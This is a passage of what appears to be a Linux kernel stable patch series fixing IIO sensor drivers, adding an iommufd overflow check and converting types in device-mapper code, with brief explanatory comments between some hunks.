+-			*val = (be32_to_cpu(st->data.d32) >> st->sub_lsb)
++			*val = (be32_to_cpu(st->data.d32) >> 6)
+ 				- BIT(ddata->chip_info->resolution + 1);
+ 		}
+ 
+@@ -122,7 +121,6 @@ static int ltc2497_probe(struct i2c_client *client)
+ 	st->common_ddata.chip_info = chip_info;
+ 
+ 	resolution = chip_info->resolution;
+-	st->sub_lsb = 31 - (resolution + 1);
+ 	st->recv_size = BITS_TO_BYTES(resolution) + 1;
+ 
+ 	return ltc2497core_probe(dev, indio_dev);
+diff --git a/drivers/iio/adc/max11410.c b/drivers/iio/adc/max11410.c
+index fdc9f03135b54..e64cd979688d0 100644
+--- a/drivers/iio/adc/max11410.c
++++ b/drivers/iio/adc/max11410.c
+@@ -413,13 +413,17 @@ static int max11410_sample(struct max11410_state *st, int *sample_raw,
+ 		if (!ret)
+ 			return -ETIMEDOUT;
+ 	} else {
++		int ret2;
++
+ 		/* Wait for status register Conversion Ready flag */
+-		ret = read_poll_timeout(max11410_read_reg, ret,
+-					ret || (val & MAX11410_STATUS_CONV_READY_BIT),
++		ret = read_poll_timeout(max11410_read_reg, ret2,
++					ret2 || (val & MAX11410_STATUS_CONV_READY_BIT),
+ 					5000, MAX11410_CONVERSION_TIMEOUT_MS * 1000,
+ 					true, st, MAX11410_REG_STATUS, &val);
+ 		if (ret)
+ 			return ret;
++		if (ret2)
++			return ret2;
+ 	}
+ 
+ 	/* Read ADC Data */
+@@ -850,17 +854,21 @@ static int max11410_init_vref(struct device *dev,
+ 
+ static int max11410_calibrate(struct max11410_state *st, u32 cal_type)
+ {
+-	int ret, val;
++	int ret, ret2, val;
+ 
+ 	ret = max11410_write_reg(st, MAX11410_REG_CAL_START, cal_type);
+ 	if (ret)
+ 		return ret;
+ 
+ 	/* Wait for status register Calibration Ready flag */
+-	return read_poll_timeout(max11410_read_reg, ret,
+-				 ret || (val & MAX11410_STATUS_CAL_READY_BIT),
+-				 50000, MAX11410_CALIB_TIMEOUT_MS * 1000, true,
+-				 st, MAX11410_REG_STATUS, &val);
++	ret = read_poll_timeout(max11410_read_reg, ret2,
++				ret2 || (val & MAX11410_STATUS_CAL_READY_BIT),
++				50000, MAX11410_CALIB_TIMEOUT_MS * 1000, true,
++				st, MAX11410_REG_STATUS, &val);
++	if (ret)
++		return ret;
++
++	return ret2;
+ }
+ 
+ static int max11410_self_calibrate(struct max11410_state *st)
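
Both max11410 hunks apply the same fix: the poll helper's own return value (a timeout) was clobbering the polled read's return value, so each now gets its own variable. A self-contained sketch of that two-error pattern, with a plain loop standing in for read_poll_timeout:

#include <errno.h>

static int poll_status(int (*read_status)(int *val), int *op_ret,
		       int *val, int ready_bit)
{
	for (int tries = 0; tries < 1000; tries++) {
		*op_ret = read_status(val);
		if (*op_ret || (*val & ready_bit))
			return 0; /* polling stopped; *op_ret says why */
	}
	return -ETIMEDOUT; /* the poll itself gave up */
}

static int wait_ready(int (*read_status)(int *val), int ready_bit)
{
	int ret2, val;
	int ret = poll_status(read_status, &ret2, &val, ready_bit);

	if (ret)        /* infrastructure error: timeout */
		return ret;
	return ret2;    /* device error (or 0) from the polled read */
}
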
+diff --git a/drivers/iio/adc/qcom-spmi-adc5.c b/drivers/iio/adc/qcom-spmi-adc5.c
+index 821fee60a7651..d1b86570768a9 100644
+--- a/drivers/iio/adc/qcom-spmi-adc5.c
++++ b/drivers/iio/adc/qcom-spmi-adc5.c
+@@ -626,12 +626,20 @@ static int adc5_get_fw_channel_data(struct adc5_chip *adc,
+ 				    struct fwnode_handle *fwnode,
+ 				    const struct adc5_data *data)
+ {
+-	const char *name = fwnode_get_name(fwnode), *channel_name;
++	const char *channel_name;
++	char *name;
+ 	u32 chan, value, varr[2];
+ 	u32 sid = 0;
+ 	int ret;
+ 	struct device *dev = adc->dev;
+ 
++	name = devm_kasprintf(dev, GFP_KERNEL, "%pfwP", fwnode);
++	if (!name)
++		return -ENOMEM;
++
++	/* Cut the address part */
++	name[strchrnul(name, '@') - name] = '\0';
++
+ 	ret = fwnode_property_read_u32(fwnode, "reg", &chan);
+ 	if (ret) {
+ 		dev_err(dev, "invalid channel number %s\n", name);
+diff --git a/drivers/iio/adc/ti-ads7950.c b/drivers/iio/adc/ti-ads7950.c
+index 2cc9a9bd9db60..263fc3a1b87e1 100644
+--- a/drivers/iio/adc/ti-ads7950.c
++++ b/drivers/iio/adc/ti-ads7950.c
+@@ -634,6 +634,7 @@ static int ti_ads7950_probe(struct spi_device *spi)
+ 	st->chip.label = dev_name(&st->spi->dev);
+ 	st->chip.parent = &st->spi->dev;
+ 	st->chip.owner = THIS_MODULE;
++	st->chip.can_sleep = true;
+ 	st->chip.base = -1;
+ 	st->chip.ngpio = TI_ADS7950_NUM_GPIOS;
+ 	st->chip.get_direction = ti_ads7950_get_direction;
+diff --git a/drivers/iio/dac/cio-dac.c b/drivers/iio/dac/cio-dac.c
+index 791dd999cf291..18a64f72fc188 100644
+--- a/drivers/iio/dac/cio-dac.c
++++ b/drivers/iio/dac/cio-dac.c
+@@ -66,8 +66,8 @@ static int cio_dac_write_raw(struct iio_dev *indio_dev,
+ 	if (mask != IIO_CHAN_INFO_RAW)
+ 		return -EINVAL;
+ 
+-	/* DAC can only accept up to a 16-bit value */
+-	if ((unsigned int)val > 65535)
++	/* DAC can only accept up to a 12-bit value */
++	if ((unsigned int)val > 4095)
+ 		return -EINVAL;
+ 
+ 	priv->chan_out_states[chan->channel] = val;
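The corrected bound matches a 12-bit DAC (0..4095). An equivalent formulation using GENMASK, purely illustrative:

	if ((unsigned int)val > GENMASK(11, 0))	/* 0xfff == 4095 */
		return -EINVAL;
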
+diff --git a/drivers/iio/imu/Kconfig b/drivers/iio/imu/Kconfig
+index f1d7d4b5e2224..c2f97629e9cdb 100644
+--- a/drivers/iio/imu/Kconfig
++++ b/drivers/iio/imu/Kconfig
+@@ -47,6 +47,7 @@ config ADIS16480
+ 	depends on SPI
+ 	select IIO_ADIS_LIB
+ 	select IIO_ADIS_LIB_BUFFER if IIO_BUFFER
++	select CRC32
+ 	help
+ 	  Say yes here to build support for Analog Devices ADIS16375, ADIS16480,
+ 	  ADIS16485, ADIS16488 inertial sensors.
+diff --git a/drivers/iio/industrialio-buffer.c b/drivers/iio/industrialio-buffer.c
+index 80c78bd6bbef4..a7a080bed1808 100644
+--- a/drivers/iio/industrialio-buffer.c
++++ b/drivers/iio/industrialio-buffer.c
+@@ -203,24 +203,27 @@ static ssize_t iio_buffer_write(struct file *filp, const char __user *buf,
+ 				break;
+ 			}
+ 
++			if (filp->f_flags & O_NONBLOCK) {
++				if (!written)
++					ret = -EAGAIN;
++				break;
++			}
++
+ 			wait_woken(&wait, TASK_INTERRUPTIBLE,
+ 					MAX_SCHEDULE_TIMEOUT);
+ 			continue;
+ 		}
+ 
+ 		ret = rb->access->write(rb, n - written, buf + written);
+-		if (ret == 0 && (filp->f_flags & O_NONBLOCK))
+-			ret = -EAGAIN;
++		if (ret < 0)
++			break;
+ 
+-		if (ret > 0) {
+-			written += ret;
+-			if (written != n && !(filp->f_flags & O_NONBLOCK))
+-				continue;
+-		}
+-	} while (ret == 0);
++		written += ret;
++
++	} while (written != n);
+ 	remove_wait_queue(&rb->pollq, &wait);
+ 
+-	return ret < 0 ? ret : n;
++	return ret < 0 ? ret : written;
+ }
+ 
+ /**
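The rewritten loop changes the partial-write semantics: with O_NONBLOCK, -EAGAIN is only returned when nothing has been written yet, otherwise the partial count is reported; a hard write error still wins. A condensed model of the control flow (hypothetical helpers, not the driver code):

	for (;;) {
		if (!space_available(rb)) {
			if (nonblock)
				return written ? written : -EAGAIN;
			wait_for_space(rb);
			continue;
		}
		ret = do_write(rb, buf + written, n - written);
		if (ret < 0)
			return ret;	/* an error discards the partial count */
		written += ret;
		if (written == n)
			return written;
	}
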
+diff --git a/drivers/iio/light/cm32181.c b/drivers/iio/light/cm32181.c
+index b1674a5bfa368..d4a34a3bf00d9 100644
+--- a/drivers/iio/light/cm32181.c
++++ b/drivers/iio/light/cm32181.c
+@@ -429,6 +429,14 @@ static const struct iio_info cm32181_info = {
+ 	.attrs			= &cm32181_attribute_group,
+ };
+ 
++static void cm32181_unregister_dummy_client(void *data)
++{
++	struct i2c_client *client = data;
++
++	/* Unregister the dummy client */
++	i2c_unregister_device(client);
++}
++
+ static int cm32181_probe(struct i2c_client *client)
+ {
+ 	struct device *dev = &client->dev;
+@@ -460,6 +468,10 @@ static int cm32181_probe(struct i2c_client *client)
+ 		client = i2c_acpi_new_device(dev, 1, &board_info);
+ 		if (IS_ERR(client))
+ 			return PTR_ERR(client);
++
++		ret = devm_add_action_or_reset(dev, cm32181_unregister_dummy_client, client);
++		if (ret)
++			return ret;
+ 	}
+ 
+ 	cm32181 = iio_priv(indio_dev);
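The ACPI path creates a second ("dummy") I2C client that was previously leaked on probe failure and on remove. devm_add_action_or_reset() is the usual fix: it registers a cleanup to run at driver detach, and if the registration itself fails it runs the action immediately and returns the error. A generic sketch of the pattern:

	static void my_unregister(void *data)
	{
		i2c_unregister_device(data);	/* runs at detach, or at once on failure */
	}

	ret = devm_add_action_or_reset(dev, my_unregister, client);
	if (ret)
		return ret;	/* client already unregistered by the _or_reset path */
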
+diff --git a/drivers/iio/light/vcnl4000.c b/drivers/iio/light/vcnl4000.c
+index cc1a2062e76d6..69c5bc987e261 100644
+--- a/drivers/iio/light/vcnl4000.c
++++ b/drivers/iio/light/vcnl4000.c
+@@ -199,7 +199,6 @@ static int vcnl4000_init(struct vcnl4000_data *data)
+ 
+ 	data->rev = ret & 0xf;
+ 	data->al_scale = 250000;
+-	mutex_init(&data->vcnl4000_lock);
+ 
+ 	return data->chip_spec->set_power_state(data, true);
+ };
+@@ -1197,6 +1196,8 @@ static int vcnl4000_probe(struct i2c_client *client)
+ 	data->id = id->driver_data;
+ 	data->chip_spec = &vcnl4000_chip_spec_cfg[data->id];
+ 
++	mutex_init(&data->vcnl4000_lock);
++
+ 	ret = data->chip_spec->init(data);
+ 	if (ret < 0)
+ 		return ret;
+diff --git a/drivers/iommu/iommufd/pages.c b/drivers/iommu/iommufd/pages.c
+index 1e1d3509efae5..105e0c4dc1990 100644
+--- a/drivers/iommu/iommufd/pages.c
++++ b/drivers/iommu/iommufd/pages.c
+@@ -294,9 +294,9 @@ static void batch_clear_carry(struct pfn_batch *batch, unsigned int keep_pfns)
+ 			batch->npfns[batch->end - 1] < keep_pfns);
+ 
+ 	batch->total_pfns = keep_pfns;
+-	batch->npfns[0] = keep_pfns;
+ 	batch->pfns[0] = batch->pfns[batch->end - 1] +
+ 			 (batch->npfns[batch->end - 1] - keep_pfns);
++	batch->npfns[0] = keep_pfns;
+ 	batch->end = 0;
+ }
+ 
+@@ -1140,6 +1140,7 @@ struct iopt_pages *iopt_alloc_pages(void __user *uptr, unsigned long length,
+ 				    bool writable)
+ {
+ 	struct iopt_pages *pages;
++	unsigned long end;
+ 
+ 	/*
+ 	 * The iommu API uses size_t as the length, and protect the DIV_ROUND_UP
+@@ -1148,6 +1149,9 @@ struct iopt_pages *iopt_alloc_pages(void __user *uptr, unsigned long length,
+ 	if (length > SIZE_MAX - PAGE_SIZE || length == 0)
+ 		return ERR_PTR(-EINVAL);
+ 
++	if (check_add_overflow((unsigned long)uptr, length, &end))
++		return ERR_PTR(-EOVERFLOW);
++
+ 	pages = kzalloc(sizeof(*pages), GFP_KERNEL_ACCOUNT);
+ 	if (!pages)
+ 		return ERR_PTR(-ENOMEM);
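check_add_overflow() (linux/overflow.h) evaluates start + length, stores the sum, and returns true if it wrapped; rejecting that early keeps every later index computation on the range in-bounds. A minimal sketch:

	unsigned long start = (unsigned long)uptr, end;

	if (check_add_overflow(start, length, &end))
		return ERR_PTR(-EOVERFLOW);	/* user range wraps the address space */
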
+@@ -1201,13 +1205,21 @@ iopt_area_unpin_domain(struct pfn_batch *batch, struct iopt_area *area,
+ 			unsigned long start =
+ 				max(start_index, *unmapped_end_index);
+ 
++			if (IS_ENABLED(CONFIG_IOMMUFD_TEST) &&
++			    batch->total_pfns)
++				WARN_ON(*unmapped_end_index -
++						batch->total_pfns !=
++					start_index);
+ 			batch_from_domain(batch, domain, area, start,
+ 					  last_index);
+-			batch_last_index = start + batch->total_pfns - 1;
++			batch_last_index = start_index + batch->total_pfns - 1;
+ 		} else {
+ 			batch_last_index = last_index;
+ 		}
+ 
++		if (IS_ENABLED(CONFIG_IOMMUFD_TEST))
++			WARN_ON(batch_last_index > real_last_index);
++
+ 		/*
+ 		 * unmaps must always 'cut' at a place where the pfns are not
+ 		 * contiguous to pair with the maps that always install
+diff --git a/drivers/md/dm-bio-prison-v1.c b/drivers/md/dm-bio-prison-v1.c
+index 1f8f98efd97a0..138067abe14b7 100644
+--- a/drivers/md/dm-bio-prison-v1.c
++++ b/drivers/md/dm-bio-prison-v1.c
+@@ -285,14 +285,14 @@ EXPORT_SYMBOL_GPL(dm_cell_promote_or_release);
+ 
+ struct dm_deferred_entry {
+ 	struct dm_deferred_set *ds;
+-	unsigned count;
++	unsigned int count;
+ 	struct list_head work_items;
+ };
+ 
+ struct dm_deferred_set {
+ 	spinlock_t lock;
+-	unsigned current_entry;
+-	unsigned sweeper;
++	unsigned int current_entry;
++	unsigned int sweeper;
+ 	struct dm_deferred_entry entries[DEFERRED_SET_SIZE];
+ };
+ 
+@@ -338,7 +338,7 @@ struct dm_deferred_entry *dm_deferred_entry_inc(struct dm_deferred_set *ds)
+ }
+ EXPORT_SYMBOL_GPL(dm_deferred_entry_inc);
+ 
+-static unsigned ds_next(unsigned index)
++static unsigned int ds_next(unsigned int index)
+ {
+ 	return (index + 1) % DEFERRED_SET_SIZE;
+ }
+@@ -373,7 +373,7 @@ EXPORT_SYMBOL_GPL(dm_deferred_entry_dec);
+ int dm_deferred_set_add_work(struct dm_deferred_set *ds, struct list_head *work)
+ {
+ 	int r = 1;
+-	unsigned next_entry;
++	unsigned int next_entry;
+ 
+ 	spin_lock_irq(&ds->lock);
+ 	if ((ds->sweeper == ds->current_entry) &&
+diff --git a/drivers/md/dm-bio-prison-v2.c b/drivers/md/dm-bio-prison-v2.c
+index 9dec3b61cf70a..0cc0d13c40e51 100644
+--- a/drivers/md/dm-bio-prison-v2.c
++++ b/drivers/md/dm-bio-prison-v2.c
+@@ -148,7 +148,7 @@ static bool __find_or_insert(struct dm_bio_prison_v2 *prison,
+ 
+ static bool __get(struct dm_bio_prison_v2 *prison,
+ 		  struct dm_cell_key_v2 *key,
+-		  unsigned lock_level,
++		  unsigned int lock_level,
+ 		  struct bio *inmate,
+ 		  struct dm_bio_prison_cell_v2 *cell_prealloc,
+ 		  struct dm_bio_prison_cell_v2 **cell)
+@@ -171,7 +171,7 @@ static bool __get(struct dm_bio_prison_v2 *prison,
+ 
+ bool dm_cell_get_v2(struct dm_bio_prison_v2 *prison,
+ 		    struct dm_cell_key_v2 *key,
+-		    unsigned lock_level,
++		    unsigned int lock_level,
+ 		    struct bio *inmate,
+ 		    struct dm_bio_prison_cell_v2 *cell_prealloc,
+ 		    struct dm_bio_prison_cell_v2 **cell_result)
+@@ -224,7 +224,7 @@ EXPORT_SYMBOL_GPL(dm_cell_put_v2);
+ 
+ static int __lock(struct dm_bio_prison_v2 *prison,
+ 		  struct dm_cell_key_v2 *key,
+-		  unsigned lock_level,
++		  unsigned int lock_level,
+ 		  struct dm_bio_prison_cell_v2 *cell_prealloc,
+ 		  struct dm_bio_prison_cell_v2 **cell_result)
+ {
+@@ -255,7 +255,7 @@ static int __lock(struct dm_bio_prison_v2 *prison,
+ 
+ int dm_cell_lock_v2(struct dm_bio_prison_v2 *prison,
+ 		    struct dm_cell_key_v2 *key,
+-		    unsigned lock_level,
++		    unsigned int lock_level,
+ 		    struct dm_bio_prison_cell_v2 *cell_prealloc,
+ 		    struct dm_bio_prison_cell_v2 **cell_result)
+ {
+@@ -291,7 +291,7 @@ EXPORT_SYMBOL_GPL(dm_cell_quiesce_v2);
+ 
+ static int __promote(struct dm_bio_prison_v2 *prison,
+ 		     struct dm_bio_prison_cell_v2 *cell,
+-		     unsigned new_lock_level)
++		     unsigned int new_lock_level)
+ {
+ 	if (!cell->exclusive_lock)
+ 		return -EINVAL;
+@@ -302,7 +302,7 @@ static int __promote(struct dm_bio_prison_v2 *prison,
+ 
+ int dm_cell_lock_promote_v2(struct dm_bio_prison_v2 *prison,
+ 			    struct dm_bio_prison_cell_v2 *cell,
+-			    unsigned new_lock_level)
++			    unsigned int new_lock_level)
+ {
+ 	int r;
+ 
+diff --git a/drivers/md/dm-bio-prison-v2.h b/drivers/md/dm-bio-prison-v2.h
+index 6e04234268db3..5a7d996bbbd80 100644
+--- a/drivers/md/dm-bio-prison-v2.h
++++ b/drivers/md/dm-bio-prison-v2.h
+@@ -44,8 +44,8 @@ struct dm_cell_key_v2 {
+ struct dm_bio_prison_cell_v2 {
+ 	// FIXME: pack these
+ 	bool exclusive_lock;
+-	unsigned exclusive_level;
+-	unsigned shared_count;
++	unsigned int exclusive_level;
++	unsigned int shared_count;
+ 	struct work_struct *quiesce_continuation;
+ 
+ 	struct rb_node node;
+@@ -86,7 +86,7 @@ void dm_bio_prison_free_cell_v2(struct dm_bio_prison_v2 *prison,
+  */
+ bool dm_cell_get_v2(struct dm_bio_prison_v2 *prison,
+ 		    struct dm_cell_key_v2 *key,
+-		    unsigned lock_level,
++		    unsigned int lock_level,
+ 		    struct bio *inmate,
+ 		    struct dm_bio_prison_cell_v2 *cell_prealloc,
+ 		    struct dm_bio_prison_cell_v2 **cell_result);
+@@ -114,7 +114,7 @@ bool dm_cell_put_v2(struct dm_bio_prison_v2 *prison,
+  */
+ int dm_cell_lock_v2(struct dm_bio_prison_v2 *prison,
+ 		    struct dm_cell_key_v2 *key,
+-		    unsigned lock_level,
++		    unsigned int lock_level,
+ 		    struct dm_bio_prison_cell_v2 *cell_prealloc,
+ 		    struct dm_bio_prison_cell_v2 **cell_result);
+ 
+@@ -132,7 +132,7 @@ void dm_cell_quiesce_v2(struct dm_bio_prison_v2 *prison,
+  */
+ int dm_cell_lock_promote_v2(struct dm_bio_prison_v2 *prison,
+ 			    struct dm_bio_prison_cell_v2 *cell,
+-			    unsigned new_lock_level);
++			    unsigned int new_lock_level);
+ 
+ /*
+  * Adds any held bios to the bio list.
+diff --git a/drivers/md/dm-bufio.c b/drivers/md/dm-bufio.c
+index 19caaf684ee34..382c5cc471952 100644
+--- a/drivers/md/dm-bufio.c
++++ b/drivers/md/dm-bufio.c
+@@ -89,7 +89,7 @@ struct dm_bufio_client {
+ 	unsigned long n_buffers[LIST_SIZE];
+ 
+ 	struct block_device *bdev;
+-	unsigned block_size;
++	unsigned int block_size;
+ 	s8 sectors_per_block_bits;
+ 	void (*alloc_callback)(struct dm_buffer *);
+ 	void (*write_callback)(struct dm_buffer *);
+@@ -98,9 +98,9 @@ struct dm_bufio_client {
+ 	struct dm_io_client *dm_io;
+ 
+ 	struct list_head reserved_buffers;
+-	unsigned need_reserved_buffers;
++	unsigned int need_reserved_buffers;
+ 
+-	unsigned minimum_buffers;
++	unsigned int minimum_buffers;
+ 
+ 	struct rb_root buffer_tree;
+ 	wait_queue_head_t free_buffer_wait;
+@@ -145,14 +145,14 @@ struct dm_buffer {
+ 	unsigned char list_mode;		/* LIST_* */
+ 	blk_status_t read_error;
+ 	blk_status_t write_error;
+-	unsigned accessed;
+-	unsigned hold_count;
++	unsigned int accessed;
++	unsigned int hold_count;
+ 	unsigned long state;
+ 	unsigned long last_accessed;
+-	unsigned dirty_start;
+-	unsigned dirty_end;
+-	unsigned write_start;
+-	unsigned write_end;
++	unsigned int dirty_start;
++	unsigned int dirty_end;
++	unsigned int write_start;
++	unsigned int write_end;
+ 	struct dm_bufio_client *c;
+ 	struct list_head write_list;
+ 	void (*end_io)(struct dm_buffer *, blk_status_t);
+@@ -220,7 +220,7 @@ static unsigned long global_num = 0;
+ /*
+  * Buffers are freed after this timeout
+  */
+-static unsigned dm_bufio_max_age = DM_BUFIO_DEFAULT_AGE_SECS;
++static unsigned int dm_bufio_max_age = DM_BUFIO_DEFAULT_AGE_SECS;
+ static unsigned long dm_bufio_retain_bytes = DM_BUFIO_DEFAULT_RETAIN_BYTES;
+ 
+ static unsigned long dm_bufio_peak_allocated;
+@@ -438,7 +438,7 @@ static void *alloc_buffer_data(struct dm_bufio_client *c, gfp_t gfp_mask,
+ 	 * as if GFP_NOIO was specified.
+ 	 */
+ 	if (gfp_mask & __GFP_NORETRY) {
+-		unsigned noio_flag = memalloc_noio_save();
++		unsigned int noio_flag = memalloc_noio_save();
+ 		void *ptr = __vmalloc(c->block_size, gfp_mask);
+ 
+ 		memalloc_noio_restore(noio_flag);
+@@ -591,7 +591,7 @@ static void dmio_complete(unsigned long error, void *context)
+ }
+ 
+ static void use_dmio(struct dm_buffer *b, enum req_op op, sector_t sector,
+-		     unsigned n_sectors, unsigned offset)
++		     unsigned int n_sectors, unsigned int offset)
+ {
+ 	int r;
+ 	struct dm_io_request io_req = {
+@@ -629,11 +629,11 @@ static void bio_complete(struct bio *bio)
+ }
+ 
+ static void use_bio(struct dm_buffer *b, enum req_op op, sector_t sector,
+-		    unsigned n_sectors, unsigned offset)
++		    unsigned int n_sectors, unsigned int offset)
+ {
+ 	struct bio *bio;
+ 	char *ptr;
+-	unsigned vec_size, len;
++	unsigned int vec_size, len;
+ 
+ 	vec_size = b->c->block_size >> PAGE_SHIFT;
+ 	if (unlikely(b->c->sectors_per_block_bits < PAGE_SHIFT - SECTOR_SHIFT))
+@@ -654,7 +654,7 @@ dmio:
+ 	len = n_sectors << SECTOR_SHIFT;
+ 
+ 	do {
+-		unsigned this_step = min((unsigned)(PAGE_SIZE - offset_in_page(ptr)), len);
++		unsigned int this_step = min((unsigned int)(PAGE_SIZE - offset_in_page(ptr)), len);
+ 		if (!bio_add_page(bio, virt_to_page(ptr), this_step,
+ 				  offset_in_page(ptr))) {
+ 			bio_put(bio);
+@@ -684,9 +684,9 @@ static inline sector_t block_to_sector(struct dm_bufio_client *c, sector_t block
+ static void submit_io(struct dm_buffer *b, enum req_op op,
+ 		      void (*end_io)(struct dm_buffer *, blk_status_t))
+ {
+-	unsigned n_sectors;
++	unsigned int n_sectors;
+ 	sector_t sector;
+-	unsigned offset, end;
++	unsigned int offset, end;
+ 
+ 	b->end_io = end_io;
+ 
+@@ -1156,7 +1156,7 @@ void *dm_bufio_new(struct dm_bufio_client *c, sector_t block,
+ EXPORT_SYMBOL_GPL(dm_bufio_new);
+ 
+ void dm_bufio_prefetch(struct dm_bufio_client *c,
+-		       sector_t block, unsigned n_blocks)
++		       sector_t block, unsigned int n_blocks)
+ {
+ 	struct blk_plug plug;
+ 
+@@ -1232,7 +1232,7 @@ void dm_bufio_release(struct dm_buffer *b)
+ EXPORT_SYMBOL_GPL(dm_bufio_release);
+ 
+ void dm_bufio_mark_partial_buffer_dirty(struct dm_buffer *b,
+-					unsigned start, unsigned end)
++					unsigned int start, unsigned int end)
+ {
+ 	struct dm_bufio_client *c = b->c;
+ 
+@@ -1529,13 +1529,13 @@ void dm_bufio_forget_buffers(struct dm_bufio_client *c, sector_t block, sector_t
+ }
+ EXPORT_SYMBOL_GPL(dm_bufio_forget_buffers);
+ 
+-void dm_bufio_set_minimum_buffers(struct dm_bufio_client *c, unsigned n)
++void dm_bufio_set_minimum_buffers(struct dm_bufio_client *c, unsigned int n)
+ {
+ 	c->minimum_buffers = n;
+ }
+ EXPORT_SYMBOL_GPL(dm_bufio_set_minimum_buffers);
+ 
+-unsigned dm_bufio_get_block_size(struct dm_bufio_client *c)
++unsigned int dm_bufio_get_block_size(struct dm_bufio_client *c)
+ {
+ 	return c->block_size;
+ }
+@@ -1734,15 +1734,15 @@ static unsigned long dm_bufio_shrink_count(struct shrinker *shrink, struct shrin
+ /*
+  * Create the buffering interface
+  */
+-struct dm_bufio_client *dm_bufio_client_create(struct block_device *bdev, unsigned block_size,
+-					       unsigned reserved_buffers, unsigned aux_size,
++struct dm_bufio_client *dm_bufio_client_create(struct block_device *bdev, unsigned int block_size,
++					       unsigned int reserved_buffers, unsigned int aux_size,
+ 					       void (*alloc_callback)(struct dm_buffer *),
+ 					       void (*write_callback)(struct dm_buffer *),
+ 					       unsigned int flags)
+ {
+ 	int r;
+ 	struct dm_bufio_client *c;
+-	unsigned i;
++	unsigned int i;
+ 	char slab_name[27];
+ 
+ 	if (!block_size || block_size & ((1 << SECTOR_SHIFT) - 1)) {
+@@ -1796,7 +1796,7 @@ struct dm_bufio_client *dm_bufio_client_create(struct block_device *bdev, unsign
+ 
+ 	if (block_size <= KMALLOC_MAX_SIZE &&
+ 	    (block_size < PAGE_SIZE || !is_power_of_2(block_size))) {
+-		unsigned align = min(1U << __ffs(block_size), (unsigned)PAGE_SIZE);
++		unsigned int align = min(1U << __ffs(block_size), (unsigned int)PAGE_SIZE);
+ 		snprintf(slab_name, sizeof slab_name, "dm_bufio_cache-%u", block_size);
+ 		c->slab_cache = kmem_cache_create(slab_name, block_size, align,
+ 						  SLAB_RECLAIM_ACCOUNT, NULL);
+@@ -1872,7 +1872,7 @@ EXPORT_SYMBOL_GPL(dm_bufio_client_create);
+  */
+ void dm_bufio_client_destroy(struct dm_bufio_client *c)
+ {
+-	unsigned i;
++	unsigned int i;
+ 
+ 	drop_buffers(c);
+ 
+@@ -1920,9 +1920,9 @@ void dm_bufio_set_sector_offset(struct dm_bufio_client *c, sector_t start)
+ }
+ EXPORT_SYMBOL_GPL(dm_bufio_set_sector_offset);
+ 
+-static unsigned get_max_age_hz(void)
++static unsigned int get_max_age_hz(void)
+ {
+-	unsigned max_age = READ_ONCE(dm_bufio_max_age);
++	unsigned int max_age = READ_ONCE(dm_bufio_max_age);
+ 
+ 	if (max_age > UINT_MAX / HZ)
+ 		max_age = UINT_MAX / HZ;
+@@ -1973,7 +1973,7 @@ static void do_global_cleanup(struct work_struct *w)
+ 	struct dm_bufio_client *locked_client = NULL;
+ 	struct dm_bufio_client *current_client;
+ 	struct dm_buffer *b;
+-	unsigned spinlock_hold_count;
++	unsigned int spinlock_hold_count;
+ 	unsigned long threshold = dm_bufio_cache_size -
+ 		dm_bufio_cache_size / DM_BUFIO_LOW_WATERMARK_RATIO;
+ 	unsigned long loops = global_num * 2;
+diff --git a/drivers/md/dm-cache-background-tracker.c b/drivers/md/dm-cache-background-tracker.c
+index 7887f99b82bd5..c606e6bfc3f8b 100644
+--- a/drivers/md/dm-cache-background-tracker.c
++++ b/drivers/md/dm-cache-background-tracker.c
+@@ -17,7 +17,7 @@ struct bt_work {
+ };
+ 
+ struct background_tracker {
+-	unsigned max_work;
++	unsigned int max_work;
+ 	atomic_t pending_promotes;
+ 	atomic_t pending_writebacks;
+ 	atomic_t pending_demotes;
+@@ -29,7 +29,7 @@ struct background_tracker {
+ 	struct kmem_cache *work_cache;
+ };
+ 
+-struct background_tracker *btracker_create(unsigned max_work)
++struct background_tracker *btracker_create(unsigned int max_work)
+ {
+ 	struct background_tracker *b = kmalloc(sizeof(*b), GFP_KERNEL);
+ 
+@@ -155,13 +155,13 @@ static void update_stats(struct background_tracker *b, struct policy_work *w, in
+ 	}
+ }
+ 
+-unsigned btracker_nr_writebacks_queued(struct background_tracker *b)
++unsigned int btracker_nr_writebacks_queued(struct background_tracker *b)
+ {
+ 	return atomic_read(&b->pending_writebacks);
+ }
+ EXPORT_SYMBOL_GPL(btracker_nr_writebacks_queued);
+ 
+-unsigned btracker_nr_demotions_queued(struct background_tracker *b)
++unsigned int btracker_nr_demotions_queued(struct background_tracker *b)
+ {
+ 	return atomic_read(&b->pending_demotes);
+ }
+diff --git a/drivers/md/dm-cache-background-tracker.h b/drivers/md/dm-cache-background-tracker.h
+index 27ab90dbc2752..14d3d53dc77a3 100644
+--- a/drivers/md/dm-cache-background-tracker.h
++++ b/drivers/md/dm-cache-background-tracker.h
+@@ -12,19 +12,44 @@
+ 
+ /*----------------------------------------------------------------*/
+ 
++/*
++ * The cache policy decides what background work should be performed,
++ * such as promotions, demotions and writebacks. The core cache target
++ * is in charge of performing the work, and does so when it sees fit.
++ *
++ * The background_tracker acts as a go between. Keeping track of future
++ * work that the policy has decided upon, and handing (issuing) it to
++ * the core target when requested.
++ *
++ * There is no locking in this, so calls will probably need to be
++ * protected with a spinlock.
++ */
++
+ struct background_work;
+ struct background_tracker;
+ 
+ /*
+- * FIXME: discuss lack of locking in all methods.
++ * Create a new tracker, it will not be able to queue more than
++ * 'max_work' entries.
++ */
++struct background_tracker *btracker_create(unsigned int max_work);
++
++/*
++ * Destroy the tracker. No issued, but not complete, work should
++ * exist when this is called. It is fine to have queued but unissued
++ * work.
+  */
+-struct background_tracker *btracker_create(unsigned max_work);
+ void btracker_destroy(struct background_tracker *b);
+ 
+-unsigned btracker_nr_writebacks_queued(struct background_tracker *b);
+-unsigned btracker_nr_demotions_queued(struct background_tracker *b);
++unsigned int btracker_nr_writebacks_queued(struct background_tracker *b);
++unsigned int btracker_nr_demotions_queued(struct background_tracker *b);
+ 
+ /*
++ * Queue some work within the tracker. 'work' should point to the work
++ * to queue, this will be copied (ownership doesn't pass).  If pwork
++ * is not NULL then it will be set to point to the tracker's internal
++ * copy of the work.
++ *
+  * returns -EINVAL iff the work is already queued.  -ENOMEM if the work
+  * couldn't be queued for another reason.
+  */
+@@ -33,11 +58,20 @@ int btracker_queue(struct background_tracker *b,
+ 		   struct policy_work **pwork);
+ 
+ /*
++ * Hands out the next piece of work to be performed.
+  * Returns -ENODATA if there's no work.
+  */
+ int btracker_issue(struct background_tracker *b, struct policy_work **work);
+-void btracker_complete(struct background_tracker *b,
+-		       struct policy_work *op);
++
++/*
++ * Informs the tracker that the work has been completed and it may forget
++ * about it.
++ */
